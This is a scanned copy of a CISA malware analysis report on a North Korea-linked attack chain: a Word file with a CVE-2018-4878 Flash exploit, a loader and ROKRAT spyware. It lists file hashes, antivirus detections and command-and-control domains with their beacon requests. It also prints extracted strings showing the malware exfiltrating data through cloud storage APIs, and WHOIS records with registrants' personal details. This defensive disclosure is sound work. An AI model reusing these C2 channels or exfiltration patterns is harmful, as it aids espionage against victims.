www.cisa.gov
Open in
urlscan Pro
2600:141b:1c00:258d::447a
Public Scan
Submitted URL: https://www.us-cert.gov/ncas/analysis-reports/ar20-133d
Effective URL: https://www.cisa.gov/news-events/analysis-reports/ar20-133d
Submission: On November 14 via api from IN — Scanned from US
Effective URL: https://www.cisa.gov/news-events/analysis-reports/ar20-133d
Submission: On November 14 via api from IN — Scanned from US
Form analysis 2 forms found in the DOM
<form class="gsc-search-box gsc-search-box-tools" accept-charset="utf-8">
<table cellspacing="0" cellpadding="0" role="presentation" class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<div class="gsc-input-box" id="gsc-iw-id1">
<table cellspacing="0" cellpadding="0" role="presentation" id="gs_id50" class="gstl_50 gsc-input" style="width: 100%; padding: 0px;">
<tbody>
<tr>
<td id="gs_tti50" class="gsib_a"><input autocomplete="off" type="text" size="10" class="gsc-input" name="search" title="search" aria-label="search" id="gsc-i-id1" dir="ltr" spellcheck="false"
style="width: 100%; padding: 0px; border: none; margin: 0px; height: auto; outline: none;"></td>
<td class="gsib_b">
<div class="gsst_b" id="gs_st50" dir="ltr"><a class="gsst_a" href="javascript:void(0)" title="Clear search box" role="button" style="display: none;"><span class="gscb_a" id="gs_cb50" aria-hidden="true">×</span></a></div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td class="gsc-search-button"><button class="gsc-search-button gsc-search-button-v2"><svg width="13" height="13" viewBox="0 0 13 13">
<title>search</title>
<path
d="m4.8495 7.8226c0.82666 0 1.5262-0.29146 2.0985-0.87438 0.57232-0.58292 0.86378-1.2877 0.87438-2.1144 0.010599-0.82666-0.28086-1.5262-0.87438-2.0985-0.59352-0.57232-1.293-0.86378-2.0985-0.87438-0.8055-0.010599-1.5103 0.28086-2.1144 0.87438-0.60414 0.59352-0.8956 1.293-0.87438 2.0985 0.021197 0.8055 0.31266 1.5103 0.87438 2.1144 0.56172 0.60414 1.2665 0.8956 2.1144 0.87438zm4.4695 0.2115 3.681 3.6819-1.259 1.284-3.6817-3.7 0.0019784-0.69479-0.090043-0.098846c-0.87973 0.76087-1.92 1.1413-3.1207 1.1413-1.3553 0-2.5025-0.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239c0-1.3553 0.4696-2.4966 1.4088-3.4239 0.9392-0.92727 2.0864-1.3969 3.4417-1.4088 1.3553-0.011889 2.4906 0.45771 3.406 1.4088 0.9154 0.95107 1.379 2.0924 1.3909 3.4239 0 1.2126-0.38043 2.2588-1.1413 3.1385l0.098834 0.090049z">
</path>
</svg></button></td>
<td class="gsc-clear-button">
<div class="gsc-clear-button" title="clear results"> </div>
</td>
</tr>
</tbody>
</table>
</form><form class="gsc-search-box gsc-search-box-tools" accept-charset="utf-8">
<table cellspacing="0" cellpadding="0" role="presentation" class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<div class="gsc-input-box" id="gsc-iw-id2">
<table cellspacing="0" cellpadding="0" role="presentation" id="gs_id51" class="gstl_51 gsc-input" style="width: 100%; padding: 0px;">
<tbody>
<tr>
<td id="gs_tti51" class="gsib_a"><input autocomplete="off" type="text" size="10" class="gsc-input" name="search" title="search" aria-label="search" id="gsc-i-id2" dir="ltr" spellcheck="false"
style="width: 100%; padding: 0px; border: none; margin: 0px; height: auto; outline: none;"></td>
<td class="gsib_b">
<div class="gsst_b" id="gs_st51" dir="ltr"><a class="gsst_a" href="javascript:void(0)" title="Clear search box" role="button" style="display: none;"><span class="gscb_a" id="gs_cb51" aria-hidden="true">×</span></a></div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td class="gsc-search-button"><button class="gsc-search-button gsc-search-button-v2"><svg width="13" height="13" viewBox="0 0 13 13">
<title>search</title>
<path
d="m4.8495 7.8226c0.82666 0 1.5262-0.29146 2.0985-0.87438 0.57232-0.58292 0.86378-1.2877 0.87438-2.1144 0.010599-0.82666-0.28086-1.5262-0.87438-2.0985-0.59352-0.57232-1.293-0.86378-2.0985-0.87438-0.8055-0.010599-1.5103 0.28086-2.1144 0.87438-0.60414 0.59352-0.8956 1.293-0.87438 2.0985 0.021197 0.8055 0.31266 1.5103 0.87438 2.1144 0.56172 0.60414 1.2665 0.8956 2.1144 0.87438zm4.4695 0.2115 3.681 3.6819-1.259 1.284-3.6817-3.7 0.0019784-0.69479-0.090043-0.098846c-0.87973 0.76087-1.92 1.1413-3.1207 1.1413-1.3553 0-2.5025-0.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239c0-1.3553 0.4696-2.4966 1.4088-3.4239 0.9392-0.92727 2.0864-1.3969 3.4417-1.4088 1.3553-0.011889 2.4906 0.45771 3.406 1.4088 0.9154 0.95107 1.379 2.0924 1.3909 3.4239 0 1.2126-0.38043 2.2588-1.1413 3.1385l0.098834 0.090049z">
</path>
</svg></button></td>
<td class="gsc-clear-button">
<div class="gsc-clear-button" title="clear results"> </div>
</td>
</tr>
</tbody>
</table>
</form>Text Content
Skip to main content
An official website of the United States government
Here’s how you know
Here’s how you know
Official websites use .gov
A .gov website belongs to an official government organization in the United
States.
Secure .gov websites use HTTPS
A lock (LockA locked padlock) or https:// means you’ve safely connected to the
.gov website. Share sensitive information only on official, secure websites.
Free Cyber ServicesElection Threat Updates#protect2024Secure Our WorldShields
UpReport A Cyber Issue
Search
×
search
Menu
Close
×
search
* Topics
Topics
Cybersecurity Best Practices
Cyber Threats and Advisories
Critical Infrastructure Security and Resilience
Election Security
Emergency Communications
Industrial Control Systems
Information and Communications Technology Supply Chain Security
Partnerships and Collaboration
Physical Security
Risk Management
How can we help?
GovernmentEducational InstitutionsIndustryState, Local, Tribal, and
TerritorialIndividuals and FamiliesSmall and Medium BusinessesFind Help
LocallyFaith-Based CommunityExecutivesHigh-Risk Communities
* Spotlight
* Resources & Tools
Resources & Tools
All Resources & Tools
Services
Programs
Resources
Training
Groups
* News & Events
News & Events
News
Events
Cybersecurity Alerts & Advisories
Directives
Request a CISA Speaker
Congressional Testimony
CISA Conferences
CISA Live!
* Careers
Careers
Benefits & Perks
HireVue Applicant Reasonable Accommodations Process
Hiring
Resume & Application Tips
Students & Recent Graduates
Veteran and Military Spouses
Work @ CISA
* About
About
Culture
Divisions & Offices
Regions
Leadership
Doing Business with CISA
Site Links
Reporting Employee and Contractor Misconduct
CISA GitHub
CISA Central
2023 Year In Review
Contact Us
Subscribe
Free Cyber ServicesElection Threat Updates#protect2024Secure Our WorldShields
UpReport A Cyber Issue
Breadcrumb
1. Home
2. News & Events
3. Cybersecurity Advisories
4. Analysis Report
Share:
Analysis Report
MAR-10160323-1.V2
Last Revised
May 12, 2020
Alert Code
AR20-133D
NOTIFICATION
This report is provided "as is" for informational purposes only. The Department
of Homeland Security (DHS) does not provide any warranties of any kind regarding
any information contained herein. The DHS does not endorse any commercial
product or service referenced in this bulletin or otherwise.
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use
TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in
accordance with applicable rules and procedures for public release. Subject to
standard copyright rules, TLP:WHITE information may be distributed without
restriction. For more information on the Traffic Light Protocol (TLP), see
http://www.us-cert.gov/tlp.
SUMMARY
DESCRIPTION
The CISA Code & Media Analysis team received three artifacts for analysis. The
first artifact is a malicious Microsoft Word document that contains an embedded
Shockwave Flash (SWF) application file. This embedded SWF file attempts to
exploit the vulnerability detailed within CVE-2018-4878. The second artifact
executes an embedded resource named “JOK” and injects it into the Windows
application “Wscript.exe.” This embedded resource contains an encoded variant of
the malware known as ROKRAT. The third artifact in this report is the embedded
ROKRAT variant, which was extracted from the loader during analysis.
For a downloadable copy of IOCs, see MAR-10160323-1.v2.stix.
SUBMITTED FILES (5)
3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
(3f98c434d7b39de61a8b459180dd46...)
851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
(aa525af1589156fc09f78e69b3b034...)
e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
(d2881e56e66aeaebef7efaa60a58ef...)
e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
(5c6c1ed910e7c9740a0289a6d27890...)
fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
(111d205422fe90848c2f41cc84ebd9...)
DOMAINS (2)
www.1588-2040.co.kr
www.korea-tax.info
FINDINGS
3B1395F620E428C5F68C6497A2338DA0C4F749FEB64E8F12E4C5B1288CC57A1C
TAGS
CVE-2018-4878trojan
DETAILS
Name 3f98c434d7b39de61a8b459180dd46a3 Size 121344 bytes Type Composite Document
File V2 Document, Cannot read section info MD5 3f98c434d7b39de61a8b459180dd46a3
SHA1 1584b3ce64835a3c7b796139fbd981a9f2cddb6c SHA256
3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c SHA512
27643afc00fda2dd8b447af1e6950d65fe5b4dd91a8eb022fef68694126efe41fd8895a6c065c261507bb526668c27f4bc055ac58c592d43cf760c32e365be2d
ssdeep
1536:+dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9n:u1FLNEfBj2NSRvZQnEDtShuA3H9yW
Entropy 7.947501
ANTIVIRUS
Ahnlab SWF/Agent Antiy Trojan[Exploit]/SWF.CVE-2018-4878 Avira
EXP/CVE-2018-4878.A.Gen BitDefender Exploit.Agent.MS ClamAV
Swf.Trojan.Rokrat-6443186-0 Cyren Siwifi ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Exploit.Agent.MS (B) Ikarus Trojan.SWF.Exploit McAfee RDN/Generic
Exploit.lv Microsoft Security Essentials Exploit:SWF/Korpode.A NetGate
Exploit.Win32.Generic Quick Heal Exp.OLE.CVE-2018-4878.C Sophos Troj/SwfExp-OI
Symantec Trojan.Gen.NPE.2 TACHYON Trojan-Exploit/W97.Agent.Gen TrendMicro
TROJ_EX.F2A7C559 TrendMicro House Call TROJ_EX.F2A7C559
YARA RULES
No matches found.
SSDEEP MATCHES
97 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1 97
851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a 97
e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87
RELATIONSHIPS
3b1395f620... Contains
851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
DESCRIPTION
This file is a malicious Microsoft Word document. This document contains an
embedded malicious ShockWave Flash (SWF) file (851b7b04cc) designed to exploit
the vulnerability detailed within CVE-2018-4878.
851B7B044CBCAA67350AFF80A5B9FB4C63393957F3D4B30005A83348FE69AC5A
TAGS
CVE-2018-4878trojan
DETAILS
Name aa525af1589156fc09f78e69b3b03428 Size 117864 bytes Type Macromedia Flash
data, version 32 MD5 aa525af1589156fc09f78e69b3b03428 SHA1
6ff889358923ab2a0de80303be9ac559a555b9b9 SHA256
851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a SHA512
3a82f830bcf547c94a3b0e56ffa27330328b392a4d1356f7e62a28c18d2eb110507968a3f66e51e985ffceb3640885e5402623cf9ab987ae7a005cff2b1edd57
ssdeep
1536:4dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9S:41FLNEfBj2NSRvZQnEDtShuA3H9yf
Entropy 7.987027
ANTIVIRUS
Ahnlab SWF/Cve-2018-4878.R.SS18 Avira EXP/CVE-2018-4878.A.Gen BitDefender
Exploit.Agent.MS ClamAV Win.Trojan.Agent-6551186-0 Cyren
SWF/CVE-2018-4878.B!Camelot ESET SWF/Exploit.CVE-2018-4878.A trojan Emsisoft
Exploit.Agent.MS (B) Ikarus Trojan.SWF.Exploit McAfee Exploit-CVE2018-4878.b
Microsoft Security Essentials Exploit:SWF/Korpode.A!gen Quick Heal
Exp.SWF.CVE-2018-4878.D Sophos Troj/SwfExp-OK Symantec Trojan.Gen.NPE.2 TACHYON
Trojan-Exploit/SWF.Agent.Gen
YARA RULES
No matches found.
SSDEEP MATCHES
97 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c 99
6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1 97
e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87
RELATIONSHIPS
851b7b044c... Contained_Within
3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c 851b7b044c...
Connected_To www.korea-tax.info
DESCRIPTION
This file is the malicious ShockWave Flash (SWF) file embedded in the Microsoft
Word document 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c.
When the malware is executed, it attempts to connect to the hard-coded Command
and Control (C2) server "www.korea-tax.info."
WWW.KOREA-TAX.INFO
TAGS
command-and-control
URLS
* www.korea-tax.info/crossdomain.xml
* www.korea-tax.info/main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
PORTS
* 80 TCP
HTTP SESSIONS
* GET /crossdomain.xml HTTP/1.1
Host: www.korea-tax.info
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
* GET
/main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
HTTP/1.1
Host: www.korea-tax.info
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
WHOIS
Queried whois.afilias.info with "korea-tax.info"...
Domain Name: KOREA-TAX.INFO
Registry Domain ID: D503300000055962553-LRMS
Registrar WHOIS Server:
Registrar URL: http://www.PublicDomainRegistry.com
Updated Date: 2018-02-10T20:31:57Z
Creation Date: 2017-12-12T05:52:58Z
Registry Expiry Date: 2018-12-12T05:52:58Z
Registrar Registration Expiration Date:
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1.2013775952
Reseller:
Domain Status: clientTransferProhibited
https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C213778924-LRMS
Registrant Name: yang jieun
Registrant Organization: yang jieun
Registrant Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Registrant City: Kwangmyong
Registrant State/Province: Kyonggi-do
Registrant Postal Code: 14200
Registrant Country: KR
Registrant Phone: +82.1044612320
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: john.chapman91128@gmail.com
Registry Admin ID: C213778924-LRMS
Admin Name: yang jieun
Admin Organization: yang jieun
Admin Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Admin City: Kwangmyong
Admin State/Province: Kyonggi-do
Admin Postal Code: 14200
Admin Country: KR
Admin Phone: +82.1044612320
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: john.chapman91128@gmail.com
Registry Tech ID: C213778924-LRMS
Tech Name: yang jieun
Tech Organization: yang jieun
Tech Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Tech City: Kwangmyong
Tech State/Province: Kyonggi-do
Tech Postal Code: 14200
Tech Country: KR
Tech Phone: +82.1044612320
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: john.chapman91128@gmail.com
Registry Billing ID: C213778924-LRMS
Billing Name: yang jieun
Billing Organization: yang jieun
Billing Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Billing City: Kwangmyong
Billing State/Province: Kyonggi-do
Billing Postal Code: 14200
Billing Country: KR
Billing Phone: +82.1044612320
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: john.chapman91128@gmail.com
Name Server: NS3.HOSTINGER.COM
Name Server: NS4.HOSTINGER.COM
Name Server: NS1.HOSTINGER.COM
Name Server: NS2.HOSTINGER.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
RELATIONSHIPS
www.korea-tax.info Connected_From
851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
DESCRIPTION
Identified malicious C2 Server.
FEC71B8479F3A416FA58580AE76A8C731C2294C24663C601A1267E0E5C2678A0
TAGS
CVE-2018-4878trojan
DETAILS
Name 111d205422fe90848c2f41cc84ebd96a Size 117338 bytes Type Macromedia Flash
data, version 32 MD5 111d205422fe90848c2f41cc84ebd96a SHA1
b03f6f336c07d514edb15d6e3fefd98432cae7e2 SHA256
fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 SHA512
a8e7db77fd6f27ae8ca18be8ed644df3443d17b048fc6baf1b7496da2810b014e19a35e9502de252ad65cf4feb07ccba53aeb567ad62d897231c1a3b17d619b5
ssdeep 3072:BebZ1dssmUo7VUthHkNEVVKJ6ydYBpb2N4r1Je:sbZfssAGoQymsgM Entropy
7.983610
ANTIVIRUS
Ahnlab SWF/Cve-2018-4878.R.SS18 Antiy Trojan[Exploit]/SWF.CVE-2018-4878 Avira
EXP/CVE-2018-4878.A.Gen BitDefender Script.SWF.C589 ClamAV
Swf.Trojan.Rokrat-6443186-0 Cyren SWF/CVE-2018-4878.B!Camelot ESET
SWF/Exploit.CVE-2018-4878.A trojan Emsisoft Script.SWF.C589 (B) Ikarus
Trojan.SWF.Exploit McAfee Exploit-CVE2018-4878.b Microsoft Security Essentials
Exploit:SWF/Korpode.A!gen NANOAV Exploit.Swf.CVE20184878.exmycd Quick Heal
Exp.SWF.CVE-2018-4878.D Sophos Troj/SWFExp-OL Symantec Trojan.Gen.2 TACHYON
Trojan-Exploit/SWF.Agent.Gen TrendMicro SWF_EXP.3A46FD51 TrendMicro House Call
SWF_EXP.3A46FD51
YARA RULES
No matches found.
SSDEEP MATCHES
99 3004196da6055c6f062c94a9aae8dc357fa19b953b071049083e69e840083cf9
RELATIONSHIPS
fec71b8479... Connected_To www.1588-2040.co.kr
DESCRIPTION
This file is a malicious ShockWave Flash (SWF) file designed to exploit the
vulnerability detailed within CVE-2018-4878. When executed, the malware attempts
to connect to the hard-coded command-and-control (C2) server
"www.1588-2040.co.kr."
WWW.1588-2040.CO.KR
TAGS
command-and-control
URLS
* www.1588-2040.co.kr/crossdomain.xml
* www.1588-2040.co.kr/design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
PORTS
* 80 TCP
HTTP SESSIONS
* GET /crossdomain.xml HTTP/1.1
Host: www.1588-2040.co.kr
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
* GET
/design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
HTTP/1.1
Host: www.1588-2040.co.kr
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
WHOIS
Domain Name : 1588-2040.co.kr
Registrant : S.S. Moon
Registrant Address : 1303 manhatan b/d 36-2, Yeoeuido-dong
Yeongdeungpo-gu Seoul Korea
Registrant Zip Code : 150749
Administrative Contact(AC) : S.S. Moon
AC E-Mail : card15882040@nate.com
AC Phone Number : 02-2090-3500
Registered Date : 2009. 07. 03.
Last Updated Date : 2015. 07. 03.
Expiration Date : 2018. 07. 03.
Publishes : Y
Authorized Agency : Asadal, Inc.(http://www.asadal.co.kr)
DNSSEC : unsigned
Primary Name Server
Host Name : ns.epart.com
Secondary Name Server
Host Name : ns1.epart.com
RELATIONSHIPS
www.1588-2040.co.kr Connected_From
fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
DESCRIPTION
Identified malicious C2 domain.
E1546323DC746ED2F7A5C973DCECC79B014B68BDD8A6230239283B4F775F4BBD
TAGS
backdoordroppertrojan
DETAILS
Name d2881e56e66aeaebef7efaa60a58ef9b Size 626688 bytes Type PE32 executable
(GUI) Intel 80386, for MS Windows MD5 d2881e56e66aeaebef7efaa60a58ef9b SHA1
c09c1be69e5a206bcfe3d726773f0b0ddecb3622 SHA256
e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd SHA512
da6e40bcebc6161386142caa6c1e68faf7f520cc48cbb514d8029d65f9bb0cac14bde435eb584a998be9e379cc875b85719cc0d4ee9d0fed73b5c20cf7da7fe8
ssdeep 12288:cbeQy0+6dUlyAcdqfAkMvGpns9gKYLd+NjhzZkZf7:AfuJGv2ns9XRkZf Entropy
7.866467
ANTIVIRUS
Ahnlab Trojan/Win32.Loader Antiy Trojan/Win32.RockRat Avira TR/Dropper.Gen
BitDefender Trojan.GenericKD.41796224 ClamAV Win.Trojan.Rokrat-6443187-0 Cyren
W32/Trojan.IKOU-3732 ESET Win32/Spy.Agent.PHF trojan Emsisoft
Trojan.GenericKD.41796224 (B) Filseclab Trojan.RockRat.gen.qzrl Ikarus
Trojan.Win32.Krypt K7 Trojan ( 00525b861 ) McAfee Trojan-FPCM!D2881E56E66A
Microsoft Security Essentials Trojan:Win32/Korpode.A!dha NANOAV
Trojan.Win32.RockRat.exmijf NetGate Trojan.Win32.Malware Quick Heal
Trojan.RockRat.S1875120 Sophos Mal/FakeAV-ST Symantec Backdoor.Rokrat Systweak
trojan.korpode TrendMicro Backdoo.3FA9A8A6 TrendMicro House Call
Backdoo.3FA9A8A6 Vir.IT eXplorer Trojan.Win32.Spy.AST VirusBlokAda
Malware-Cryptor.Inject.gen
YARA RULES
No matches found.
SSDEEP MATCHES
No matches found.
PACKERS/COMPILERS/CRYPTORS
Microsoft Visual C++ ?.?
RELATIONSHIPS
e1546323dc... Contains
e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
DESCRIPTION
This file is a loader. It is designed to load and execute data contained within
an embedded resource named "JOK" into the Windows application "Wscript.exe." The
embedded "JOK" resource is approximately 522,848 bytes in size and contains
executable code. The beginning portion of the data reveals the presence of a NOP
sled (0x90, 0x90, 0x90, ...), which leads to a decoder stub. The decoder code
decodes the embedded executable code within the Windows "Wscript.exe" process.
The embedded executable code has been identified as ROKRAT
(e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573).
SCREENSHOTS
Figure 1 -
E200517AB9482E787A59E60ACCC8552BD0C844687CD0CF8EC4238ED2FC2FA573
TAGS
spywaretrojan
DETAILS
Name 5c6c1ed910e7c9740a0289a6d278908a Size 520704 bytes Type PE32 executable
(GUI) Intel 80386, for MS Windows MD5 5c6c1ed910e7c9740a0289a6d278908a SHA1
0e46e026890982da526d8acf9f1ce6287451c9a6 SHA256
e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 SHA512
e2d3059e28998bfb5c0badf3d6d8df28e527037c33b489b7dcc2f392a1d91a568beef410a4feaabc4daee98112142e58394ed5e2a73c71ed0cb46943eb3383d1
ssdeep
6144:Wh65XKGJs5Ve5psLyYuwAKdf9Q4p9FCAkko7cmxBZAk4+AJ6P3VNUo+wABK7Cl/5:SAKdf+4p9J2x0k4+AQ3VNH+rZx7Aq9
Entropy 6.560851
ANTIVIRUS
Ahnlab Trojan/Win32.Hwdoor Antiy Trojan[Spy]/Win32.Agent Avira HEUR/AGEN.1133065
BitDefender Gen:Variant.Graftor.538484 ClamAV Win.Trojan.Rokrat-6380697-0 ESET a
variant of Win32/Spy.Agent.PHF trojan Emsisoft Gen:Variant.Graftor.538484 (B)
Ikarus Trojan-Spy.Agent K7 Spyware ( 0051fbf81 ) Microsoft Security Essentials
Trojan:Win32/Korpode.A!dha NANOAV Trojan.Win32.Generic.evuabe NetGate
Trojan.Win32.Malware Sophos Troj/Spy-AQO Symantec Trojan.Gen.2 Systweak
malware.gen-rg TACHYON Trojan-Spy/W32.Agent.520704.E TrendMicro TSPY_KO.89D03B8E
TrendMicro House Call TSPY_KO.89D03B8E Vir.IT eXplorer Trojan.Win32.Spy.BUB
VirusBlokAda TrojanSpy.Agent
YARA RULES
No matches found.
SSDEEP MATCHES
No matches found.
PACKERS/COMPILERS/CRYPTORS
Microsoft Visual C++ ?.?
RELATIONSHIPS
e200517ab9... Contained_Within
e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
DESCRIPTION
This file has been identified as a variant of the malware known as ROKRAT and
was obtained by extracting it from the file
e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd.
Displayed below are strings of interest extracted from this variant of ROKRAT.
--Begin Strings of Interest--
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/53.0.2785.116 Safari/537.36
access_token
authorization_code
bearer
client_id
client_secret
code
expires_in
grant_type
redirect_uri
refresh_token
response_type
scope
state
token
token_type
access_token
authorization_code
bearer
client_id
client_secret
code
expires_in
grant_type
redirect_uri
refresh_token
response_type
scope
state
token
token_type
Accept
Accept-Charset
Accept-Encoding
Accept-Language
Accept-Ranges
Age
Allow
Authorization
Cache-Control
Connection
Content-Encoding
Content-Language
Content-Length
Content-Location
Content-MD5
Content-Range
Content-Type
Content-Disposition
Date
ETag
Expect
Expires
From
Host
If-Match
If-Modified-Since
If-None-Match
If-Range
If-Unmodified-Since
Last-Modified
Location
Max-Forwards
Pragma
Proxy-Authenticate
Proxy-Authorization
Range
Referer
Retry-After
Server
Trailer
Transfer-Encoding
Upgrade
User-Agent
Vary
Via
Warning
WWW-Authenticate
Cookie
Set-Cookie
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
en-US,en;q=0.8
Bearer
http://127.0.0.1/
https://api.box.com/oauth2/token
https://account.box.com/api/oauth2/authorize
https://api.box.com/2.0/folders/%s/items
GET
entries
etag
name
sequence_id
type
folder
file
POST
201
409
DELETE
204
https://api.box.com/2.0/files/%s/content
200
https://api.box.com/2.0/files/%s
https://api.box.com/2.0/files/%s/trash
https://upload.box.com/api/2.0/files/content
--opxer--
Content-Disposition: form-data; name="attributes"
"}}
", "parent":{"id":"
{"name":"
Content-Disposition: form-data; name="file"; filename="
Content-Type: video/dat
multipart/form-data;boundary=--opxer--
error
sha1
description
created_at
modified_at
size
https://api.box.com/2.0/folders/%s
Error
var request_token = '
max-age=0
<input type="hidden" name="ic" value="
<input type="hidden" name="state" value="
<form action="
box_visitor_id=
bv=
cn=
site_preference=
302
vector<T> too long
invalid string position
string too long
Aapplication/json
path
https://api.dropboxapi.com/2/files/delete
https://content.dropboxapi.com/2/files/upload
application/octet-stream
{"path":"%s","mode":{".tag":"overwrite"}}
{"path":"%s"}
Dropbox-API-Arg
https://content.dropboxapi.com/2/files/download
Ahttps://api.pcloud.com/oauth2_token
https://my.pcloud.com/oauth2/authorize
https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1
--wwjaughalvncjwiajs--
Content-Type: voice/mp3
multipart/form-data;boundary=--wwjaughalvncjwiajs--
fileids
https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1
hosts
https://%s%s
https://api.pcloud.com/deletefile?path=%s
true
%s/%s
OAuth
PUT
href
https://cloud-api.yandex.net/v1/disk/resources?path=%s&permanently=%s
false
202
https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s
method
https://cloud-api.yandex.net/v1/disk/resources/download?path=%s
--End Strings of Interest--
RELATIONSHIP SUMMARY
3b1395f620... Contains
851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a 851b7b044c...
Contained_Within
3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c 851b7b044c...
Connected_To www.korea-tax.info www.korea-tax.info Connected_From
851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a fec71b8479...
Connected_To www.1588-2040.co.kr www.1588-2040.co.kr Connected_From
